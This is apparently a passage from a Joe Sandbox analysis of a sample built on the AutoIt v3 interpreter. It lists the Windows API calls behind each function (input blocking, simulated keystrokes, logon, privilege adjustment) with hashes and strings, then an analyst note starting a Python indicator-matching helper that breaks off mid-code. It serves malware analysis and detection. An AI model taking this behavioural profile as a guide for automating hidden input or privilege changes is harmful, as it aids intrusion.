                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 33631002-0
                                                                                                          • Opcode ID: 133723f55accb56c8f5f69b62d5b100ed046ba34ba235a14eb3ec9087f957945
                                                                                                          • Instruction ID: 76cbd2ce0d07829bca72ff65afadfe1e69e9ee5a13bda640a5a53ddf5a9132f5
                                                                                                          • Opcode Fuzzy Hash: 133723f55accb56c8f5f69b62d5b100ed046ba34ba235a14eb3ec9087f957945
                                                                                                          • Instruction Fuzzy Hash: 781182B1901229BFEB109BE99C48FAFBBBCEB49710F040156B914FB190D2B46D0487A1
                                                                                                          APIs
                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00EA4F45
                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EA4F5C
                                                                                                          • FreeSid.ADVAPI32(?), ref: 00EA4F6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429775523-0
                                                                                                          • Opcode ID: 2a6926635341aa24d5bff1a597330137a90625b42d2ee7103c7e8e5b7ff3e008
                                                                                                          • Instruction ID: d87e6f24032cae93b4d7ba118f4a8ac835c4b8232de51359652bb51cdbb70126
                                                                                                          • Opcode Fuzzy Hash: 2a6926635341aa24d5bff1a597330137a90625b42d2ee7103c7e8e5b7ff3e008
                                                                                                          • Instruction Fuzzy Hash: 3DF04975A1130CBFDF00DFE0DC89BAEBBBCEF08201F4048A9A901E2180E7346A088B50
                                                                                                          APIs
                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EA1B01
                                                                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EA1B14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InputSendkeybd_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 3536248340-0
                                                                                                          • Opcode ID: 9b698cbdff31dbb80ea15b8e535f61aaa34aac7cd2bf47ab4a814896fcaf0643
                                                                                                          • Instruction ID: 12763716158be51ac3d81fa4964507edb99926e8c2e5f0a8151923c9af9b20aa
                                                                                                          • Opcode Fuzzy Hash: 9b698cbdff31dbb80ea15b8e535f61aaa34aac7cd2bf47ab4a814896fcaf0643
                                                                                                          • Instruction Fuzzy Hash: F5F0377190020DAFDB10CF95D805BFE7BB4EF08315F00804AFD55AA292D3799615DFA4
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00EB9B52,?,00ED098C,?), ref: 00EAA6DA
                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00EB9B52,?,00ED098C,?), ref: 00EAA6EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: 1ace06d44d89eca09a955057495d050a7e613639d43a651377c99f868627bf7e
                                                                                                          • Instruction ID: ae2f7035fe7acbc6057199af5e8a368191a263d6e1729a3ac2b5140eff06fa0e
                                                                                                          • Opcode Fuzzy Hash: 1ace06d44d89eca09a955057495d050a7e613639d43a651377c99f868627bf7e
                                                                                                          • Instruction Fuzzy Hash: ECF0823550532DBFDB21AFA4DC48FEA77ACEF09761F048166B908A6191D6309944CFA1
                                                                                                          APIs
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E98F27), ref: 00E98DFE
                                                                                                          • CloseHandle.KERNEL32(?,?,00E98F27), ref: 00E98E10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 81990902-0
                                                                                                          • Opcode ID: 27ae3331a5eac02e124e7524b04734e763e3aeeefcb87bb3e13357b93504aa87
                                                                                                          • Instruction ID: dafeb4e420a7a09f1b9286e1690d99c21dffede0a1e3036898b32e59de7dd0d5
                                                                                                          • Opcode Fuzzy Hash: 27ae3331a5eac02e124e7524b04734e763e3aeeefcb87bb3e13357b93504aa87
                                                                                                          • Instruction Fuzzy Hash: E9E04672000600EFEB622B21FD08E777BEDEB00350B18882AF49AA0470CB22AC90DB10
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E68F87,?,?,?,00000001), ref: 00E6A38A
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E6A393
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 25fe05ef13dc1addc0e43d8487d203c6ddd2f8eaed28a8bb9dee241b7ebac36f
                                                                                                          • Instruction ID: 0af2480821e3b0659977f007c339c58c14393c3857b74b855d817ce0aaa09f46
                                                                                                          • Opcode Fuzzy Hash: 25fe05ef13dc1addc0e43d8487d203c6ddd2f8eaed28a8bb9dee241b7ebac36f
                                                                                                          • Instruction Fuzzy Hash: 4AB09231065208AFCA402B96FC09B883F68EB44A62F044012F60D54060CB6254548A91
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 00EB45F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: 17c922974d7183e996a46507dab6c7a25e5e3add01882dbd4b63f0d84f65640a
                                                                                                          • Instruction ID: b4d9f28d31bd268a2b98b75ed009801a691d6b7f153e56b4afbebad038751542
                                                                                                          • Opcode Fuzzy Hash: 17c922974d7183e996a46507dab6c7a25e5e3add01882dbd4b63f0d84f65640a
                                                                                                          • Instruction Fuzzy Hash: 18E0DF76200205AFC310AF5AF800E8BF7E8EF94760F008416FC49E7392DA70EC408BA0
                                                                                                          APIs
                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00EA5205
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID:
                                                                                                          • API String ID: 2434400541-0
                                                                                                          • Opcode ID: f56f240862ed824b192ad7b68fc986279ce017f5ed1aea4d35a5b0a11db6660d
                                                                                                          • Instruction ID: b5b96925accce21e1a2301a7434aea613827bbecfc45456916cfa7f20a74f3b8
                                                                                                          • Opcode Fuzzy Hash: f56f240862ed824b192ad7b68fc986279ce017f5ed1aea4d35a5b0a11db6660d
                                                                                                          • Instruction Fuzzy Hash: 49D05E97162E0938EC180324AE0FF7602C8E32B7C4F84694B7002BD0C1FCD0784D9431
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E98FA7), ref: 00E99389
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: d22965a3795ab6e3b1f404270be9de57079767a47dff62b7f9afb33180b9c32f
                                                                                                          • Instruction ID: 0814645ade3557f750d205ed036f91e04c281159ef73343524788ff2f659a0c4
                                                                                                          • Opcode Fuzzy Hash: d22965a3795ab6e3b1f404270be9de57079767a47dff62b7f9afb33180b9c32f
                                                                                                          • Instruction Fuzzy Hash: 82D05E3226050EBFEF018EA4EC05EAE3B69EB04B01F408511FE15D50A0C775D835AB60
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E80734
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2645101109-0
                                                                                                          • Opcode ID: 3fc22cc2270f50cd9c025a0518fa14ce593c98f4135fdab6290ebea710e80ba8
                                                                                                          • Instruction ID: 789faefb8c2658d11970c6b1caa5d89a67cd66fc2d9348491b30bbaedbdf9751
                                                                                                          • Opcode Fuzzy Hash: 3fc22cc2270f50cd9c025a0518fa14ce593c98f4135fdab6290ebea710e80ba8
                                                                                                          • Instruction Fuzzy Hash: B1C04CF1801109EBCB05DBA0D988EEE77BCAB04304F140456A109B2100D7749B488B71
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E6A35A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 12b062c2df6ac288ddf397be539dda3c727a3295ed32cad2de4e3b8b438242a0
                                                                                                          • Instruction ID: 6ddc9e711303510712a41c6640915a768f07f15e9032cc7a3ea68cd2f58dc73b
                                                                                                          • Opcode Fuzzy Hash: 12b062c2df6ac288ddf397be539dda3c727a3295ed32cad2de4e3b8b438242a0
                                                                                                          • Instruction Fuzzy Hash: D0A0223002020CFFCF002F8BFC08888BFACEB002A0F008022F80C00032CB33A8208AC0
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,00ED0980), ref: 00EC3C65
                                                                                                          • IsWindowVisible.USER32(?), ref: 00EC3C89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                          • API String ID: 4105515805-45149045
                                                                                                          • Opcode ID: b078a5cbfe049101b21fa6e654b2d220ae2c1e54c1a779eb32900b07aba05749
                                                                                                          • Instruction ID: 619bb6107f33774d35da3f68df15028ce7519182fdbeb302235e4a3e5ff135d8
                                                                                                          • Opcode Fuzzy Hash: b078a5cbfe049101b21fa6e654b2d220ae2c1e54c1a779eb32900b07aba05749
                                                                                                          • Instruction Fuzzy Hash: 88D162702042159BCB04EF20D655FAAB7E1EF94344F24A55CF9567B2E2CB32ED0ACB52
                                                                                                          APIs
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00ECAC55
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00ECAC86
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00ECAC92
                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00ECACAC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00ECACBB
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00ECACE6
                                                                                                          • GetSysColor.USER32(00000010), ref: 00ECACEE
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00ECACF5
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00ECAD04
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00ECAD0B
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00ECAD56
                                                                                                          • FillRect.USER32(?,?,?), ref: 00ECAD88
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ECADB3
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(00000012), ref: 00ECAF51
                                                                                                            • Part of subcall function 00ECAF18: SetTextColor.GDI32(?,?), ref: 00ECAF55
                                                                                                            • Part of subcall function 00ECAF18: GetSysColorBrush.USER32(0000000F), ref: 00ECAF6B
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(0000000F), ref: 00ECAF76
                                                                                                            • Part of subcall function 00ECAF18: GetSysColor.USER32(00000011), ref: 00ECAF93
                                                                                                            • Part of subcall function 00ECAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00ECAFA1
                                                                                                            • Part of subcall function 00ECAF18: SelectObject.GDI32(?,00000000), ref: 00ECAFB2
                                                                                                            • Part of subcall function 00ECAF18: SetBkColor.GDI32(?,00000000), ref: 00ECAFBB
                                                                                                            • Part of subcall function 00ECAF18: SelectObject.GDI32(?,?), ref: 00ECAFC8
                                                                                                            • Part of subcall function 00ECAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00ECAFE7
                                                                                                            • Part of subcall function 00ECAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00ECAFFE
                                                                                                            • Part of subcall function 00ECAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00ECB013
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 4124339563-0
                                                                                                          • Opcode ID: a41a17ffd5d045334db3ebbb6bae37de314b29a13bbd5bac987e2df153e32fb0
                                                                                                          • Instruction ID: 0f2f24e82ef35d937114164c058de11baa21f6aac37642d34d90df6298f11d0c
                                                                                                          • Opcode Fuzzy Hash: a41a17ffd5d045334db3ebbb6bae37de314b29a13bbd5bac987e2df153e32fb0
                                                                                                          • Instruction Fuzzy Hash: 24A17F7100A305AFD7119F65ED08F6B7BA9FF48329F181A2EF962A61A0C731D845CF52
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?), ref: 00E43072
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E430B8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E430C3
                                                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00E430CE
                                                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00E430D9
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E7C77C
                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E7C7B5
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E7CBDE
                                                                                                            • Part of subcall function 00E41F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E42412,?,00000000,?,?,?,?,00E41AA7,00000000,?), ref: 00E41F76
                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00E7CC1B
                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E7CC32
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E7CC48
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E7CC53
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 464785882-4108050209
                                                                                                          • Opcode ID: 85e5cf03601c00b64423d8350e79691b9a4299ce6cbd734c584c5b1e3ee506c9
                                                                                                          • Instruction ID: 2abcbd411354083c2774173f08625f9c6d57044e718b4693eb09b62cd2628c6e
                                                                                                          • Opcode Fuzzy Hash: 85e5cf03601c00b64423d8350e79691b9a4299ce6cbd734c584c5b1e3ee506c9
                                                                                                          • Instruction Fuzzy Hash: 8F128E30604201EFDB25CF24D885BA9B7E9FF44304F28A66EF959EB252C731E945CB91
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 2660009612-1645009161
                                                                                                          • Opcode ID: 5b676b9cff109341d30aa587fc125363f13c100b8cbfb3c6490a8d96c970eef6
                                                                                                          • Instruction ID: baef79a6a4267dbc3646201681f7286374b0ba2bf665797c1378c70abcbf1330
                                                                                                          • Opcode Fuzzy Hash: 5b676b9cff109341d30aa587fc125363f13c100b8cbfb3c6490a8d96c970eef6
                                                                                                          • Instruction Fuzzy Hash: 3BA1D031A40209ABCB14AF60DC42EAE77B4EF95741F14642DFE09BB292EB71DE05D750
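Analyst note on the entry above: the strings "#OnAutoItStartRegister", "#requireadmin", "#include-once", "#notrayicon", "#pragma compile" and "Bad directive syntax error" are the preprocessor directives and error text of the AutoIt v3 script interpreter, and the entry that follows creates a window titled "AutoIt v3". That marks the dump of process 10 (offset 00E40000) as the AutoIt runtime rather than bespoke code, so the functions in this listing are the interpreter's own and the embedded script is the artefact to recover. The Python below is an example added to this page, not part of the Joe Sandbox report or its tooling: it parses function entries in the shape shown here, flags AutoIt indicators, and tallies imports by module so a long listing can be skimmed. The three-entry sample listing is a constructed, cut-down copy of entries from this page, and the indicator set is an assumption drawn from the strings visible above and AutoIt's documented directives.

```python
"""Triage helper for Joe Sandbox function ("Similarity") entries. Added example."""
import re
from collections import defaultdict

# Constructed sample: a cut-down copy of three entries in the shape
# Joe Sandbox renders them on this page (not the full listing).
SAMPLE_LISTING = """\
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00E80734
Memory Dump Source
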